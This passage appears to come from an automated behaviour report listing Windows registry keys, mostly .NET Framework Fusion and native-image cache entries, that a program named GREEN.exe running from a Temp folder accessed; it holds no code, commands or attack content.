HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3e4465a3\30aa9655 HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6c68293a\11335d01 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|GREEN.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|GREEN.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|GREEN.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6c68293a\32515038 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status 